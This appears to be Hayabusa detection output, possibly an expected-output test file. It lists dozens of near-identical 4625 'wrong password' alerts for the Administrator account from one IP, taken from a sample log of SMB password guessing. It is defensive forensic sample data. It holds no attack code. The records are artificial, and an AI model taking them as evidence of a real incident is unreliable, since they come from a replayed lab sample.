+2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pMbS0sIpbFDqJvMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldO0cAZ54BRHHDyz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OmJH2QWFPiYarKh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5fCiyHtI0OTo8pBO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e3vkVuU43tsYHUSj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.714 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3w21sFOu2u7FTDZM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bk7eaqQNK1CEgqoj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rv5joLgkm3QUYPyb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4l15usDM7jggwEyw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p9QpOvgDmiOgzQqb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dqyr8tb9TrO1aJNe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hI1bzjixP8eOdDbw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pMTAp20wXS3d1OCk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qrQGfxInmlgPqGtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZcsMMQbsnUdyLJWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8oRYZqBBsq9GyApI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0TAhib6p8fY5iOgI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FerGHj9abOe6ehZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kN4B4KLpXbyKZzGv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HJtoyRfP38T3KToO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rkI5hLApUWhGnKIs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZCPSO4JLjMur2Eow | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHmrv2xFuq7TyIQN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8SqYq3msNfFh24lg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YE0a2Bypzc1MMdGn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ojgIg88VK6hB72PI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ehLrf2GoAhY3Rf7Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ccfgpjwpis15B4gY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vysSf3DsOxQf5fVd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IEp88cEeiNw4IQsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5PXDJPzw0gPdlCiH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mwoe9IgWx2UZ7Iuu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3eW0nFDUwKFzoQIw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q0i0p5QxJ4ykYYJt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VsxqWAnd6j2CdyB3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5qdy80mtFWl199k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ce0d84uBK4t2sqR3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b4dZYZEW1VijjwHN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZmqGJWbeap5dv0gC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zaNUqChgVSbDkFQu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B4PDZ55it0V4QGnM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TQxXVB8Aj5gaw2f2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vzDeZtgSJoH74GYk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iNAFsZraFvw67WWR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aVdnbyzWqk58rOW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WjUH2PopXCrrPzqi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ylmV2z3WjTWsTpyu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8qBKZTYRTKuEAgS8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JvekO4A5f6QK2ynZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.753 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LDUqydSeA1guOjIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o71TltsJDyOIuLQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NXT3MSCes42dVCNn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FGXiWeT8Evr6G70M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V2RarzrnGgcLaseH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u3k7dXu9o1vMkhby | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EDBt76dmYnPstFWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4yjzMC7cw0fe7gjS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eQOWCM7KP68DZTX9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kn9WWWqCIwfrPbie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AQcamLSzsXOjP6FL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.278 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6R6ZMRoYkAPB35Bq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ubqnZm0jmHNFCHrM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ORQ8vL1oo6CkJXK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rDPl1SSddrWEs979 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrK7fENAr1lxFr9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wu4djhEVSMYBOmjF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e0NOdXhEkW6MskA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nqxLHaOtkHHNAa1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NCrCf73NtEpk5DUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YVFm1epksVGO1nFY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YmVehuMHvh5kVqRW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.875 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sERZrNUHsKVEShCb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eaSNgw2hvkxLnQF8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FSYOWptgxHYTDv1x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
